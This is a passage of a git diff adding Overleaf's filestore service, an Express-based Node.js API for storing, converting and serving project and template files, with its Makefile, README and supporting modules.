"\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/filestore/README.md b/services/filestore/README.md new file mode 100644 index 0000000..921fb4b --- /dev/null +++ b/services/filestore/README.md @@ -0,0 +1,22 @@ +overleaf/filestore +==================== + +An API for CRUD operations on binary files stored in S3 + +filestore acts as a proxy between the CLSIs and (currently) Amazon S3 storage, presenting a RESTful HTTP interface to the CLSIs on port 3009 by default. Urls are mapped to node functions in https://github.com/overleaf/filestore/blob/master/app.coffee . URLs are of the form: + +* `/project/:project_id/file/:file_id` +* `/template/:template_id/v/:version/:format` +* `/project/:project_id/public/:public_file_id` +* `/project/:project_id/size` +* `/bucket/:bucket/key/*` +* `/shutdown` +* `/status` - returns HTTP 200 `filestore is up` or HTTP 503 when shutting down +* `/health_check` + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. diff --git a/services/filestore/app.js b/services/filestore/app.js new file mode 100644 index 0000000..24741e0 --- /dev/null +++ b/services/filestore/app.js @@ -0,0 +1,189 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Events = require('node:events') +const Metrics = require('@overleaf/metrics') + +const logger = require('@overleaf/logger') +logger.initialize(process.env.METRICS_APP_NAME || 'filestore') + +const settings = require('@overleaf/settings') +const express = require('express') +const bodyParser = require('body-parser') + +const fileController = require('./app/js/FileController') +const keyBuilder = require('./app/js/KeyBuilder') +const healthCheckController = require('./app/js/HealthCheckController') + +const RequestLogger = require('./app/js/RequestLogger') + +Events.setMaxListeners(20) + +const app = express() + +app.use(RequestLogger.middleware) + +Metrics.open_sockets.monitor(true) +Metrics.memory.monitor(logger) +if (Metrics.event_loop) { + Metrics.event_loop.monitor(logger) +} +Metrics.leaked_sockets.monitor(logger) + +app.use(function (req, res, next) { + Metrics.inc('http-request') + next() +}) + +// Handle requests that come in after we've started shutting down +app.use((req, res, next) => { + if (settings.shuttingDown) { + logger.warn( + { req, timeSinceShutdown: Date.now() - settings.shutDownTime }, + 'request received after shutting down' + ) + // We don't want keep-alive connections to be kept open when the server is shutting down. + res.set('Connection', 'close') + } + next() +}) + +Metrics.injectMetricsRoute(app) + +if (settings.filestore.stores.user_files) { + app.head( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.getFileHead + ) + app.get( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.getFile + ) + app.post( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.insertFile + ) + app.put( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + bodyParser.json(), + fileController.copyFile + ) + app.delete( + '/project/:project_id/file/:file_id', + keyBuilder.userFileKeyMiddleware, + fileController.deleteFile + ) + app.delete( + '/project/:project_id', + keyBuilder.userProjectKeyMiddleware, + fileController.deleteProject + ) + + app.get( + '/project/:project_id/size', + keyBuilder.userProjectKeyMiddleware, + fileController.directorySize + ) +} + +if (settings.filestore.stores.template_files) { + app.head( + '/template/:template_id/v/:version/:format', + keyBuilder.templateFileKeyMiddleware, + fileController.getFileHead + ) + app.get( + '/template/:template_id/v/:version/:format', + keyBuilder.templateFileKeyMiddleware, + fileController.getFile + ) + app.get( + '/template/:template_id/v/:version/:format/:sub_type', + keyBuilder.templateFileKeyMiddleware, + fileController.getFile + ) + app.post( + '/template/:template_id/v/:version/:format', + keyBuilder.templateFileKeyMiddleware, + fileController.insertFile + ) +} + +app.get( + '/bucket/:bucket/key/*', + keyBuilder.bucketFileKeyMiddleware, + fileController.getFile +) + +app.get('/status', function (req, res) { + if (settings.shuttingDown) { + res.sendStatus(503) // Service unavailable + } else { + res.send('filestore is up') + } +}) + +app.get('/health_check', healthCheckController.check) + +app.use(RequestLogger.errorHandler) + +const port = settings.internal.filestore.port || 3009 +const host = settings.internal.filestore.host || '0.0.0.0' + +let server = null +if (!module.parent) { + // Called directly + server = app.listen(port, host, error => { + if (error) { + logger.error({ err: error }, 'Error starting Filestore') + throw error + } + logger.debug(`Filestore starting up, listening on ${host}:${port}`) + }) +} + +process + .on('unhandledRejection', (reason, p) => { + logger.err(reason, 'Unhandled Rejection at Promise', p) + }) + .on('uncaughtException', err => { + logger.err(err, 'Uncaught Exception thrown') + process.exit(1) + }) + +function handleShutdownSignal(signal) { + logger.info({ signal }, 'received interrupt, cleaning up') + if (settings.shuttingDown) { + logger.warn({ signal }, 'already shutting down, ignoring interrupt') + return + } + settings.shuttingDown = true + settings.shutDownTime = Date.now() + // stop accepting new connections, the callback is called when existing connections have finished + server.close(() => { + logger.info({ signal }, 'server closed') + // exit after a short delay so logs can be flushed + setTimeout(() => { + process.exit() + }, 100) + }) + // close idle http keep-alive connections + server.closeIdleConnections() + setTimeout(() => { + logger.info({ signal }, 'shutdown timed out, exiting') + // close all connections immediately + server.closeAllConnections() + // exit after a short delay to allow for cleanup + setTimeout(() => { + process.exit() + }, 100) + }, settings.gracefulShutdownDelayInMs) +} + +process.on('SIGTERM', handleShutdownSignal) + +module.exports = app diff --git a/services/filestore/app/js/Errors.js b/services/filestore/app/js/Errors.js new file mode 100644 index 0000000..c7d19d8 --- /dev/null +++ b/services/filestore/app/js/Errors.js @@ -0,0 +1,30 @@ +const OError = require('@overleaf/o-error') +const { Errors } = require('@overleaf/object-persistor') + +class HealthCheckError extends OError {} +class ConversionsDisabledError extends OError {} +class ConversionError extends OError {} +class TimeoutError extends OError {} +class InvalidParametersError extends OError {} + +class FailedCommandError extends OError { + constructor(command, code, stdout, stderr) { + super('command failed with error exit code', { + command, + code, + }) + this.stdout = stdout + this.stderr = stderr + this.code = code + } +} + +module.exports = { + FailedCommandError, + ConversionsDisabledError, + ConversionError, + HealthCheckError, + TimeoutError, + InvalidParametersError, + ...Errors, +} diff --git a/services/filestore/app/js/FileController.js b/services/filestore/app/js/FileController.js new file mode 100644 index 0000000..127bbcc --- /dev/null +++ b/services/filestore/app/js/FileController.js @@ -0,0 +1,214 @@ +const FileHandler = require('./FileHandler') +const metrics = require('@overleaf/metrics') +const parseRange = require('range-parser') +const Errors = require('./Errors') +const { pipeline } = require('node:stream') + +const maxSizeInBytes = 1024 * 1024 * 1024 // 1GB + +module.exports = { + getFile, + getFileHead, + insertFile, + copyFile, + deleteFile, + deleteProject, + directorySize, +} + +function getFile(req, res, next) { + const { key, bucket } = req + const { format, style } = req.query + const options = { + key, + bucket, + format, + style, + } + + metrics.inc('getFile') + req.requestLogger.setMessage('getting file') + req.requestLogger.addFields({ + key, + bucket, + format, + style, + cacheWarm: req.query.cacheWarm, + }) + + if (req.headers.range) { + const range = _getRange(req.headers.range) + if (range) { + options.start = range.start + options.end = range.end + req.requestLogger.addFields({ range }) + } + } + + FileHandler.getRedirectUrl(bucket, key, options, function (err, redirectUrl) { + if (err) { + metrics.inc('file_redirect_error') + } + + if (redirectUrl) { + metrics.inc('file_redirect') + return res.redirect(redirectUrl) + } + + FileHandler.getFile(bucket, key, options, function (err, fileStream) { + if (err) { + if (err instanceof Errors.NotFoundError) { + res.sendStatus(404) + } else { + next(err) + } + return + } + + if (req.query.cacheWarm) { + fileStream.destroy() + return res.sendStatus(200).end() + } + + pipeline(fileStream, res, err => { + if (err && err.code === 'ERR_STREAM_PREMATURE_CLOSE') { + res.end() + } else if (err) { + next( + new Errors.ReadError( + 'error transferring stream', + { bucket, key, format, style }, + err + ) + ) + } + }) + }) + }) +} + +function getFileHead(req, res, next) { + const { key, bucket } = req + + metrics.inc('getFileSize') + req.requestLogger.setMessage('getting file size') + req.requestLogger.addFields({ key, bucket }) + + FileHandler.getFileSize(bucket, key, function (err, fileSize) { + if (err) { + if (err instanceof Errors.NotFoundError) { + res.sendStatus(404) + } else { + next(err) + } + return + } + res.set('Content-Length', fileSize) + res.status(200).end() + }) +} + +function insertFile(req, res, next) { + metrics.inc('insertFile') + const { key, bucket } = req + + req.requestLogger.setMessage('inserting file') + req.requestLogger.addFields({ key, bucket }) + + FileHandler.insertFile(bucket, key, req, function (err) { + if (err) { + next(err) + } else { + res.sendStatus(200) + } + }) +} + +function copyFile(req, res, next) { + metrics.inc('copyFile') + const { key, bucket } = req + const oldProjectId = req.body.source.project_id + const oldFileId = req.body.source.file_id + + req.requestLogger.addFields({ + key, + bucket, + oldProject_id: oldProjectId, + oldFile_id: oldFileId, + }) + req.requestLogger.setMessage('copying file') + + FileHandler.copyObject(bucket, `${oldProjectId}/${oldFileId}`, key, err => { + if (err) { + if (err instanceof Errors.NotFoundError) { + res.sendStatus(404) + } else { + next(err) + } + } else { + res.sendStatus(200) + } + }) +} + +function deleteFile(req, res, next) { + metrics.inc('deleteFile') + const { key, bucket } = req + + req.requestLogger.addFields({ key, bucket }) + req.requestLogger.setMessage('deleting file') + + FileHandler.deleteFile(bucket, key, function (err) { + if (err) { + next(err) + } else { + res.sendStatus(204) + } + }) +} + +function deleteProject(req, res, next) { + metrics.inc('deleteProject') + const { key, bucket } = req + + req.requestLogger.setMessage('deleting project') + req.requestLogger.addFields({ key, bucket }) + + FileHandler.deleteProject(bucket, key, function (err) { + if (err) { + if (err instanceof Errors.InvalidParametersError) { + return res.sendStatus(400) + } + next(err) + } else { + res.sendStatus(204) + } + }) +} + +function directorySize(req, res, next) { + metrics.inc('projectSize') + const { project_id: projectId, bucket } = req + + req.requestLogger.setMessage('getting project size') + req.requestLogger.addFields({ projectId, bucket }) + + FileHandler.getDirectorySize(bucket, projectId, function (err, size) { + if (err) { + return next(err) + } + + res.json({ 'total bytes': size }) + req.requestLogger.addFields({ size }) + }) +} + +function _getRange(header) { + const parsed = parseRange(maxSizeInBytes, header) + if (parsed === -1 || parsed === -2 || parsed.type !== 'bytes') { + return null + } else { + const range = parsed[0] + return { start: range.start, end: range.end } + } +} diff --git a/services/filestore/app/js/FileConverter.js b/services/filestore/app/js/FileConverter.js new file mode 100644 index 0000000..ac3dcce --- /dev/null +++ b/services/filestore/app/js/FileConverter.js @@ -0,0 +1,98 @@ +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { callbackify } = require('node:util') + +const safeExec = require('./SafeExec').promises +const { ConversionError } = require('./Errors') + +const APPROVED_FORMATS = ['png'] +const FOURTY_SECONDS = 40 * 1000 +const KILL_SIGNAL = 'SIGTERM' + +module.exports = { + convert: callbackify(convert), + thumbnail: callbackify(thumbnail), + preview: callbackify(preview), + promises: { + convert, + thumbnail, + preview, + }, +} + +async function convert(sourcePath, requestedFormat) { + const width = '600x' + return await _convert(sourcePath, requestedFormat, [ + 'convert', + '-define', + `pdf:fit-page=${width}`, + '-flatten', + '-density', + '300', + `${sourcePath}[0]`, + ]) +} + +async function thumbnail(sourcePath) { + const width = '260x' + return await convert(sourcePath, 'png', [ + 'convert', + '-flatten', + '-background', + 'white', + '-density', + '300', + '-define', + `pdf:fit-page=${width}`, + `${sourcePath}[0]`, + '-resize', + width, + ]) +} + +async function preview(sourcePath) { + const width = '548x' + return await convert(sourcePath, 'png', [ + 'convert', + '-flatten', + '-background', + 'white', + '-density', + '300', + '-define', + `pdf:fit-page=${width}`, + `${sourcePath}[0]`, + '-resize', + width, + ]) +} + +async function _convert(sourcePath, requestedFormat, command) { + if (!APPROVED_FORMATS.includes(requestedFormat)) { + throw new ConversionError('invalid format requested', { + format: requestedFormat, + }) + } + + const timer = new metrics.Timer('imageConvert') + const destPath = `${sourcePath}.${requestedFormat}` + + command.push(destPath) + command = Settings.commands.convertCommandPrefix.concat(command) + + try { + await safeExec(command, { + killSignal: KILL_SIGNAL, + timeout: FOURTY_SECONDS, + }) + } catch (err) { + throw new ConversionError( + 'something went wrong converting file', + { stderr: err.stderr, sourcePath, requestedFormat, destPath }, + err + ) + } + + timer.done() + return destPath +} diff --git a/services/filestore/app/js/FileHandler.js b/services/filestore/app/js/FileHandler.js new file mode 100644 index 0000000..2ed28bd --- /dev/null +++ b/services/filestore/app/js/FileHandler.js @@ -0,0 +1,228 @@ +const Settings = require('@overleaf/settings') +const { callbackify } = require('node:util') +const fs = require('node:fs') +let PersistorManager = require('./PersistorManager') +const LocalFileWriter = require('./LocalFileWriter') +const FileConverter = require('./FileConverter') +const KeyBuilder = require('./KeyBuilder') +const ImageOptimiser = require('./ImageOptimiser') +const { ConversionError, InvalidParametersError } = require('./Errors') +const metrics = require('@overleaf/metrics') + +module.exports = { + copyObject: callbackify(copyObject), + insertFile: callbackify(insertFile), + deleteFile: callbackify(deleteFile), + deleteProject: callbackify(deleteProject), + getFile: callbackify(getFile), + getRedirectUrl: callbackify(getRedirectUrl), + getFileSize: callbackify(getFileSize), + getDirectorySize: callbackify(getDirectorySize), + promises: { + copyObject, + getFile, + getRedirectUrl, + insertFile, + deleteFile, + deleteProject, + getFileSize, + getDirectorySize, + }, +} + +if (process.env.NODE_ENV === 'test') { + module.exports._TESTONLYSwapPersistorManager = _PersistorManager => { + PersistorManager = _PersistorManager + } +} + +async function copyObject(bucket, sourceKey, destinationKey) { + await PersistorManager.copyObject(bucket, sourceKey, destinationKey) +} + +async function insertFile(bucket, key, stream) { + const convertedKey = KeyBuilder.getConvertedFolderKey(key) + if (!convertedKey.match(/^[0-9a-f]{24}\/([0-9a-f]{24}|v\/[0-9]+\/[a-z]+)/i)) { + throw new InvalidParametersError('key does not match validation regex', { + bucket, + key, + convertedKey, + }) + } + await PersistorManager.sendStream(bucket, key, stream) +} + +async function deleteFile(bucket, key) { + const convertedKey = KeyBuilder.getConvertedFolderKey(key) + if (!convertedKey.match(/^[0-9a-f]{24}\/([0-9a-f]{24}|v\/[0-9]+\/[a-z]+)/i)) { + throw new InvalidParametersError('key does not match validation regex', { + bucket, + key, + convertedKey, + }) + } + const jobs = [PersistorManager.deleteObject(bucket, key)] + if ( + Settings.enableConversions && + bucket === Settings.filestore.stores.template_files + ) { + jobs.push(PersistorManager.deleteDirectory(bucket, convertedKey)) + } + await Promise.all(jobs) +} + +async function deleteProject(bucket, key) { + if (!key.match(/^[0-9a-f]{24}\//i)) { + throw new InvalidParametersError('key does not match validation regex', { + bucket, + key, + }) + } + await PersistorManager.deleteDirectory(bucket, key) +} + +async function getFile(bucket, key, opts) { + opts = opts || {} + if (!opts.format && !opts.style) { + return await PersistorManager.getObjectStream(bucket, key, opts) + } else { + return await _getConvertedFile(bucket, key, opts) + } +} + +let ACTIVE_SIGNED_URL_CALLS = 0 + +async function getRedirectUrl(bucket, key, opts) { + // if we're doing anything unusual with options, or the request isn't for + // one of the default buckets, return null so that we proxy the file + opts = opts || {} + if ( + !opts.start && + !opts.end && + !opts.format && + !opts.style && + Object.values(Settings.filestore.stores).includes(bucket) && + Settings.filestore.allowRedirects + ) { + // record the number of in-flight calls to generate signed URLs + metrics.gauge('active_signed_url_calls', ++ACTIVE_SIGNED_URL_CALLS, { + path: bucket, + }) + try { + const timer = new metrics.Timer('signed_url_call_time', { + path: bucket, + }) + const redirectUrl = await PersistorManager.getRedirectUrl(bucket, key) + timer.done() + return redirectUrl + } finally { + metrics.gauge('active_signed_url_calls', --ACTIVE_SIGNED_URL_CALLS, { + path: bucket, + }) + } + } + + return null +} + +async function getFileSize(bucket, key) { + return await PersistorManager.getObjectSize(bucket, key) +} + +async function getDirectorySize(bucket, projectId) { + return await PersistorManager.directorySize(bucket, projectId) +} + +async function _getConvertedFile(bucket, key, opts) { + const convertedKey = KeyBuilder.addCachingToKey(key, opts) + const exists = await PersistorManager.checkIfObjectExists( + bucket, + convertedKey + ) + if (exists) { + return await PersistorManager.getObjectStream(bucket, convertedKey, opts) + } else { + return await _getConvertedFileAndCache(bucket, key, convertedKey, opts) + } +} + +async function _getConvertedFileAndCache(bucket, key, convertedKey, opts) { + let convertedFsPath + try { + convertedFsPath = await _convertFile(bucket, key, opts) + await ImageOptimiser.promises.compressPng(convertedFsPath) + await PersistorManager.sendFile(bucket, convertedKey, convertedFsPath) + } catch (err) { + LocalFileWriter.deleteFile(convertedFsPath, () => {}) + throw new ConversionError( + 'failed to convert file', + { opts, bucket, key, convertedKey }, + err + ) + } + // Send back the converted file from the local copy to avoid problems + // with the file not being present in S3 yet. As described in the + // documentation below, we have already made a 'HEAD' request in + // checkIfFileExists so we only have "eventual consistency" if we try + // to stream it from S3 here. This was a cause of many 403 errors. + // + // "Amazon S3 provides read-after-write consistency for PUTS of new + // objects in your S3 bucket in all regions with one caveat. The + // caveat is that if you make a HEAD or GET request to the key name + // (to find if the object exists) before creating the object, Amazon + // S3 provides eventual consistency for read-after-write."" + // https://docs.aws.amazon.com/AmazonS3/latest/dev/Introduction.html#ConsistencyModel + const readStream = fs.createReadStream(convertedFsPath) + readStream.on('error', function () { + LocalFileWriter.deleteFile(convertedFsPath, function () {}) + }) + readStream.on('end', function () { + LocalFileWriter.deleteFile(convertedFsPath, function () {}) + }) + return readStream +} + +async function _convertFile(bucket, originalKey, opts) { + let originalFsPath + try { + originalFsPath = await _writeFileToDisk(bucket, originalKey, opts) + } catch (err) { + throw new ConversionError( + 'unable to write file to disk', + { bucket, originalKey, opts }, + err + ) + } + + let promise + if (opts.format) { + promise = FileConverter.promises.convert(originalFsPath, opts.format) + } else if (opts.style === 'thumbnail') { + promise = FileConverter.promises.thumbnail(originalFsPath) + } else if (opts.style === 'preview') { + promise = FileConverter.promises.preview(originalFsPath) + } else { + throw new ConversionError('invalid file conversion options', { + bucket, + originalKey, + opts, + }) + } + let destPath + try { + destPath = await promise + } catch (err) { + throw new ConversionError( + 'error converting file', + { bucket, originalKey, opts }, + err + ) + } + LocalFileWriter.deleteFile(originalFsPath, function () {}) + return destPath +} + +async function _writeFileToDisk(bucket, key, opts) { + const fileStream = await PersistorManager.getObjectStream(bucket, key, opts) + return await LocalFileWriter.promises.writeStream(fileStream, key) +} diff --git a/services/filestore/app/js/HealthCheckController.js b/services/filestore/app/js/HealthCheckController.js new file mode 100644 index 0000000..e9b739a --- /dev/null +++ b/services/filestore/app/js/HealthCheckController.js @@ -0,0 +1,67 @@ +const fs = require('node:fs') +const path = require('node:path') +const Settings = require('@overleaf/settings') +const { WritableBuffer } = require('@overleaf/stream-utils') +const { promisify } = require('node:util') +const Stream = require('node:stream') + +const pipeline = promisify(Stream.pipeline) +const fsCopy = promisify(fs.copyFile) +const fsUnlink = promisify(fs.unlink) + +const { HealthCheckError } = require('./Errors') +const FileConverter = require('./FileConverter').promises +const FileHandler = require('./FileHandler').promises + +async function checkCanGetFiles() { + if (!Settings.health_check) { + return + } + + const projectId = Settings.health_check.project_id + const fileId = Settings.health_check.file_id + const key = `${projectId}/${fileId}` + const bucket = Settings.filestore.stores.user_files + + const buffer = new WritableBuffer({ initialSize: 100 }) + + const sourceStream = await FileHandler.getFile(bucket, key, {}) + try { + await pipeline(sourceStream, buffer) + } catch (err) { + throw new HealthCheckError('failed to get health-check file', {}, err) + } + + if (!buffer.size()) { + throw new HealthCheckError('no bytes written to download stream') + } +} + +async function checkFileConvert() { + if (!Settings.enableConversions) { + return + } + + const imgPath = path.join(Settings.path.uploadFolder, '/tiny.pdf') + + let resultPath + try { + await fsCopy('./tiny.pdf', imgPath) + resultPath = await FileConverter.thumbnail(imgPath) + } finally { + if (resultPath) { + await fsUnlink(resultPath) + } + await fsUnlink(imgPath) + } +} + +module.exports = { + check(req, res, next) { + Promise.all([checkCanGetFiles(), checkFileConvert()]) + .then(() => res.sendStatus(200)) + .catch(err => { + next(err) + }) + }, +} diff --git a/services/filestore/app/js/ImageOptimiser.js b/services/filestore/app/js/ImageOptimiser.js new file mode 100644 index 0000000..6ed29e1 --- /dev/null +++ b/services/filestore/app/js/ImageOptimiser.js @@ -0,0 +1,34 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const { callbackify } = require('node:util') +const safeExec = require('./SafeExec').promises + +module.exports = { + compressPng: callbackify(compressPng), + promises: { + compressPng, + }, +} + +async function compressPng(localPath, callback) { + const timer = new metrics.Timer('compressPng') + const args = ['optipng', localPath] + const opts = { + timeout: 30 * 1000, + killSignal: 'SIGKILL', + } + + try { + await safeExec(args, opts) + timer.done() + } catch (err) { + if (err.code === 'SIGKILL') { + logger.warn( + { err, stderr: err.stderr, localPath }, + 'optimiser timeout reached' + ) + } else { + throw err + } + } +} diff --git a/services/filestore/app/js/KeyBuilder.js b/services/filestore/app/js/KeyBuilder.js new file mode 100644 index 0000000..f67a0e8 --- /dev/null +++ b/services/filestore/app/js/KeyBuilder.js @@ -0,0 +1,71 @@ +const settings = require('@overleaf/settings') + +module.exports = { + getConvertedFolderKey, + addCachingToKey, + userFileKeyMiddleware, + userProjectKeyMiddleware, + bucketFileKeyMiddleware, + templateFileKeyMiddleware, +} + +function getConvertedFolderKey(key) { + return `${key}-converted-cache/` +} + +function addCachingToKey(key, opts) { + key = this.getConvertedFolderKey(key) + + if (opts.format && !opts.style) { + key = `${key}format-${opts.format}` + } + if (opts.style && !opts.format) { + key = `${key}style-${opts.style}` + } + if (opts.style && opts.format) { + key = `${key}format-${opts.format}-style-${opts.style}` + } + + return key +} + +function userFileKeyMiddleware(req, res, next) { + const { project_id: projectId, file_id: fileId } = req.params + req.key = `${projectId}/${fileId}` + req.bucket = settings.filestore.stores.user_files + next() +} + +function userProjectKeyMiddleware(req, res, next) { + const { project_id: projectId } = req.params + req.project_id = projectId + req.key = `${projectId}/` + req.bucket = settings.filestore.stores.user_files + next() +} + +function bucketFileKeyMiddleware(req, res, next) { + req.bucket = req.params.bucket + req.key = req.params[0] + next() +} + +function templateFileKeyMiddleware(req, res, next) { + const { + template_id: templateId, + format, + version, + sub_type: subType, + } = req.params + + req.key = `${templateId}/v/${version}/${format}` + + if (subType) { + req.key = `${req.key}/${subType}` + } + + req.bucket = settings.filestore.stores.template_files + req.version = version + + next() +} diff --git a/services/filestore/app/js/LocalFileWriter.js b/services/filestore/app/js/LocalFileWriter.js new file mode 100644 index 0000000..fe55bdc --- /dev/null +++ b/services/filestore/app/js/LocalFileWriter.js @@ -0,0 +1,56 @@ +const fs = require('node:fs') +const crypto = require('node:crypto') +const path = require('node:path') +const Stream = require('node:stream') +const { callbackify, promisify } = require('node:util') +const metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { WriteError } = require('./Errors') + +module.exports = { + promises: { + writeStream, + deleteFile, + }, + writeStream: callbackify(writeStream), + deleteFile: callbackify(deleteFile), +} + +const pipeline = promisify(Stream.pipeline) + +async function writeStream(stream, key) { + const timer = new metrics.Timer('writingFile') + const fsPath = _getPath(key) + + const writeStream = fs.createWriteStream(fsPath) + try { + await pipeline(stream, writeStream) + timer.done() + return fsPath + } catch (err) { + await deleteFile(fsPath) + + throw new WriteError('problem writing file locally', { fsPath }, err) + } +} + +async function deleteFile(fsPath) { + if (!fsPath) { + return + } + try { + await promisify(fs.unlink)(fsPath) + } catch (err) { + if (err.code !== 'ENOENT') { + throw new WriteError('failed to delete file', { fsPath }, err) + } + } +} + +function _getPath(key) { + if (key == null) { + key = crypto.randomUUID() + } + key = key.replace(/\//g, '-') + return path.join(Settings.path.uploadFolder, key) +} diff --git a/services/filestore/app/js/PersistorManager.js b/services/filestore/app/js/PersistorManager.js new file mode 100644 index 0000000..c6442d2 --- /dev/null +++ b/services/filestore/app/js/PersistorManager.js @@ -0,0 +1,9 @@ +const settings = require('@overleaf/settings') + +const persistorSettings = settings.filestore +persistorSettings.paths = settings.path + +const ObjectPersistor = require('@overleaf/object-persistor') +const persistor = ObjectPersistor(persistorSettings) + +module.exports = persistor diff --git a/services/filestore/app/js/RequestLogger.js b/services/filestore/app/js/RequestLogger.js new file mode 100644 index 0000000..1fde404 --- /dev/null +++ b/services/filestore/app/js/RequestLogger.js @@ -0,0 +1,61 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') + +class RequestLogger { + constructor() { + this._logInfo = {} + this._logMessage = 'http request' + } + + addFields(fields) { + Object.assign(this._logInfo, fields) + } + + setMessage(message) { + this._logMessage = message + } + + static errorHandler(err, req, res, next) { + req.requestLogger.addFields({ error: err }) + res.status(500).send(err.message) + } + + static middleware(req, res, next) { + const startTime = new Date() + req.requestLogger = new RequestLogger() + + // override the 'end' method to log and record metrics + const end = res.end + res.end = function () { + // apply the standard request 'end' method before logging and metrics + end.apply(this, arguments) + + const responseTime = new Date() - startTime + + const routePath = req.route && req.route.path.toString() + + if (routePath) { + metrics.timing('http_request', responseTime, null, { + method: req.method, + status_code: res.statusCode, + path: routePath.replace(/\//g, '_').replace(/:/g, '').slice(1), + }) + } + + const level = res.statusCode >= 500 ? 'err' : 'debug' + logger[level]( + { + req, + res, + responseTimeMs: responseTime, + info: req.requestLogger._logInfo, + }, + req.requestLogger._logMessage + ) + } + + next() + } +} + +module.exports = RequestLogger diff --git a/services/filestore/app/js/SafeExec.js b/services/filestore/app/js/SafeExec.js new file mode 100644 index 0000000..16ebcf1 --- /dev/null +++ b/services/filestore/app/js/SafeExec.js @@ -0,0 +1,85 @@ +const lodashOnce = require('lodash.once') +const childProcess = require('node:child_process') +const Settings = require('@overleaf/settings') +const { ConversionsDisabledError, FailedCommandError } = require('./Errors') + +// execute a command in the same way as 'exec' but with a timeout that +// kills all child processes +// +// we spawn the command with 'detached:true' to make a new process +// group, then we can kill everything in that process group. + +module.exports = safeExec +module.exports.promises = safeExecPromise + +// options are {timeout: number-of-milliseconds, killSignal: signal-name} +function safeExec(command, options, callback) { + if (!Settings.enableConversions) { + return callback( + new ConversionsDisabledError('image conversions are disabled') + ) + } + + const [cmd, ...args] = command + + const child = childProcess.spawn(cmd, args, { detached: true }) + let stdout = '' + let stderr = '' + + let killTimer + + const cleanup = lodashOnce(function (err) { + if (killTimer) { + clearTimeout(killTimer) + } + callback(err, stdout, stderr) + }) + + if (options.timeout) { + killTimer = setTimeout(function () { + try { + // use negative process id to kill process group + process.kill(-child.pid, options.killSignal || 'SIGTERM') + } catch (error) { + cleanup( + new FailedCommandError('failed to kill process after timeout', { + command, + options, + pid: child.pid, + }) + ) + } + }, options.timeout) + } + + child.on('close', function (code, signal) { + if (code || signal) { + return cleanup( + new FailedCommandError(command, code || signal, stdout, stderr) + ) + } + + cleanup() + }) + + child.on('error', err => { + cleanup(err) + }) + child.stdout.on('data', chunk => { + stdout += chunk + }) + child.stderr.on('data', chunk => { + stderr += chunk + }) +} + +function safeExecPromise(command, options) { + return new Promise((resolve, reject) => { + safeExec(command, options, (err, stdout, stderr) => { + if (err) { + reject(err) + } + resolve({ stdout, stderr }) + }) + }) +} diff --git a/services/filestore/buildscript.txt b/services/filestore/buildscript.txt new file mode 100644 index 0000000..75a491c --- /dev/null +++ b/services/filestore/buildscript.txt @@ -0,0 +1,12 @@ +filestore +--data-dirs=uploads,user_files,template_files +--dependencies=s3,gcs 